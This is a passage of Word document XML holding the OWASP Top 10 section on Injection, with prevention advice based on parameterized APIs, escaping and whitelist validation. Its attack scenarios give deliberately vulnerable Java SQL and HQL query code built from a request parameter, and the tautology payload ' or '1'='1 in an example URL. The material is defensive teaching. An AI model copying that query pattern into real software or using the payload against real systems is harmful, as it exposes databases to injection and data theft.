          <v:shape id="WS_polygon225" o:spid="_x0000_s2749" type="#polygon225" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:558.2pt;width:184.65pt;height:.6pt;z-index:-25200588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D47A76A">
          <v:shapetype id="polygon230" o:spid="_x0000_m2748" coordsize="1819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0EE4303">
          <v:shape id="WS_polygon230" o:spid="_x0000_s2747" type="#polygon230" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:574.2pt;width:181.9pt;height:.55pt;z-index:-25200486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F8D71BB">
          <v:shapetype id="polygon235" o:spid="_x0000_m2746" coordsize="1413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050C9C9">
          <v:shape id="WS_polygon235" o:spid="_x0000_s2745" type="#polygon235" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:590.15pt;width:141.35pt;height:.6pt;z-index:-25200384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659D600">
          <v:shapetype id="polygon240" o:spid="_x0000_m2744" coordsize="209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F737765">
          <v:shape id="WS_polygon240" o:spid="_x0000_s2743" type="#polygon240" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:606.2pt;width:209.5pt;height:.6pt;z-index:-25200281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BB83CC6">
          <v:shapetype id="polygon245" o:spid="_x0000_m2742" coordsize="2114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6006506">
          <v:shape id="WS_polygon245" o:spid="_x0000_s2741" type="#polygon245" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:622.2pt;width:211.4pt;height:.55pt;z-index:-25200179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8308301">
          <v:shapetype id="polygon250" o:spid="_x0000_m2740" coordsize="225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81E7F86">
          <v:shape id="WS_polygon250" o:spid="_x0000_s2739" type="#polygon250" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:638.15pt;width:225.95pt;height:.6pt;z-index:-25200076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50F206E">
          <v:shapetype id="polygon257" o:spid="_x0000_m2738" coordsize="150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05BF341">
          <v:shape id="WS_polygon257" o:spid="_x0000_s2737" type="#polygon257" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:669.2pt;width:150pt;height:.6pt;z-index:-25199974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28FCF8B">
          <v:shapetype id="polygon262" o:spid="_x0000_m2736" coordsize="123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219D38D">
          <v:shape id="WS_polygon262" o:spid="_x0000_s2735" type="#polygon262" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:685.2pt;width:123.7pt;height:.55pt;z-index:-25199872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3D589B6">
          <v:shapetype id="polygon267" o:spid="_x0000_m2734" coordsize="1538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210DB85">
          <v:shape id="WS_polygon267" o:spid="_x0000_s2733" type="#polygon267" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:701.15pt;width:153.8pt;height:.6pt;z-index:-2519976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BC243F8">
          <v:shapetype id="polygon269" o:spid="_x0000_m2732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6B68C4F">
          <v:shape id="WS_polygon269" o:spid="_x0000_s2731" type="#polygon269" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:282pt;width:266.4pt;height:3in;z-index:-25199667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04319F6D">
          <v:shapetype id="polygon270" o:spid="_x0000_m2730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BDBB36">
          <v:shape id="WS_polygon270" o:spid="_x0000_s2729" type="#polygon270" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251995648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4FC403AC">
          <v:shapetype id="polygon295" o:spid="_x0000_m2728" coordsize="714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DCDBD78">
          <v:shape id="WS_polygon295" o:spid="_x0000_s2727" type="#polygon295" style="position:absolute;left:0;text-align:left;margin-left:395.85pt;margin-top:426.2pt;width:71.4pt;height:.6pt;z-index:-2519946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8EA7238">
          <v:shapetype id="polygon314" o:spid="_x0000_m2726" coordsize="138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52CAF13">
          <v:shape id="WS_polygon314" o:spid="_x0000_s2725" type="#polygon314" style="position:absolute;left:0;text-align:left;margin-left:381.45pt;margin-top:489.2pt;width:138.7pt;height:.6pt;z-index:-251993600;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#3a6331" stroked="f"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1</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:position w:val="8"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336CA551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6A0EDD2E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574815DC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037B8533" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B194B3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA26016" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4CE34A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B869AD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BAB284" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="195F534A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790AEF7B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33924B54" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E60A2EB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C56DD33" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B70C07A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F94BEB8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18656DBE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062FBDC9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70907E7D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725183A2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C33D25E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374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Am I Vulnerable To Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A2502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 best way to find out if an application is vulnerable to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A94CC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injection is to verify that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all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> use of interpreters clearly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB0C23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eparates untrusted data from the command or query. For</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370D4CC5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QL calls, this means using bind variables in all prepared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1446E1EF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tatements and stored procedures, and avoiding dynamic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E56426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queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F16B4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Checking the code is a fast and accurate way to see if the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556DFC4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pplication uses interpreters safely. Code analysis tools can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D33D04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help a security analyst find the use of interpreters and trace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D8A1F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 data flow through the application. Penetration testers can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCB3116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validate these issues by crafting exploits that confirm the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D271274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vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFBB079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utomated dynamic scanning which exercises the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AE04FA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may provide insight into whether some exploitable injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67019767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flaws exist. Scanners cannot always reach interpreters and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431A272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have difficulty detecting whether an attack was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5DE49A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Poor error handling makes injection flaws easier to discover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7617E06D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D09B8CD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="470" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12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Example Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903460C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="289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Scenario #1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>: The application uses untrusted data in the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA30F55" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202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construction of the following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vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> SQL call:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138FE29C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="319" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="100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String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quer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SELECT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*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FROM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accounts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WHERE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F52D07" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="100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custID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request.getParameter("id")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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD1B6C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="322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Scenario #2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>: Similarly, an application’s blind trust in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A1A25A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199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frameworks may result in queries that are still vulnerable,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE1F4D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199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(e.g., Hibernate Query Language (HQL)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363A72F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="322" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="100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Quer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HQLQuer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session.createQuery(“FROM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accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5111AA96" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="100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WHERE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custID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“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request.getParameter("id")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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCA27B7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="320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In both cases, the attacker modifies the ‘id’ parameter value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F626E8C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202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in her browser to send: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or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'1'='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E37CD3F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="319" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12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http://example.com/app/accountView?id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or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1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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9C24C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="319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This changes the meaning of both queries to return all the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402FEAB3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202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records from the accounts table.  More dangerous attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094BB012" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>could modify data or even invoke stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AE4A40" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34635D6E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6304192E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F46D9D8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C200F08" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04ED7E67" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2616D663" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="552B6ACE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAD4EAD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB04DFC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12ACC897" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09980F11" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2986BA39" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A2D547" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DCE3F3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4221D557" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27025262" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1F4309" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5B640C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0619E78C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374" w:lineRule="exact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How Do I Prevent Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD48867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Preventing injection requires keeping untrusted data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3681A724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eparate from commands and queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F5F41C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000000"/>
          <w:w w:val="86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="86"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>The preferred option is to use a safe API which avoids the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A29C74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use of the interpreter entirely or provides a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D58F684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parameterized interface.  Be careful with APIs, such as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F600C4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95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stored procedures, that are parameterized, but can still</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20883EBD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introduce injection under the hood.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DBA2D7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="262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2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000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>If a parameterized API is not available, you should</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7602E533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carefully escape special characters using the specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FC039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escape syntax for that interpreter.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10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OWASP’s ESAPI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="251E3DB9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provides many of these </w:t>
      </w:r>
      <w:hyperlink r:id="rId10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scap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0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outines</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r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.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1432B515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3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000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Positive or “white list” input validation is also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859960E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recommended, but is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not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> a complete defense as many</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDE9677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applications require special characters in their input. If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393F24FA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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>special characters are required, only approaches 1. and 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A6B2E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above will make their use safe.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OWASP’s ESAPI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> has an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E8DD0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extensible library of </w:t>
      </w:r>
      <w:hyperlink r:id="rId10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whit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0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lis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0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pu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0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alid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0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outines</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId109" w:history="1">
        <w:r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.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6943570D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="451" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576F7C8A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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09ACC5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000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D35FE52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Q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jec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even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4B6A7A43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Que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arameteriz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1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4EE13A86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mman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jec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</w:p>
    <w:p w14:paraId="318F0CE2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XM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Xterna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2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XXE)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ferenc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</w:p>
    <w:p w14:paraId="57EE0AA6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SVS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utpu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coding/Escap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quirement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6)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="621B6642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3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Q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jec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</w:p>
    <w:p w14:paraId="502ED7A7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="311" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
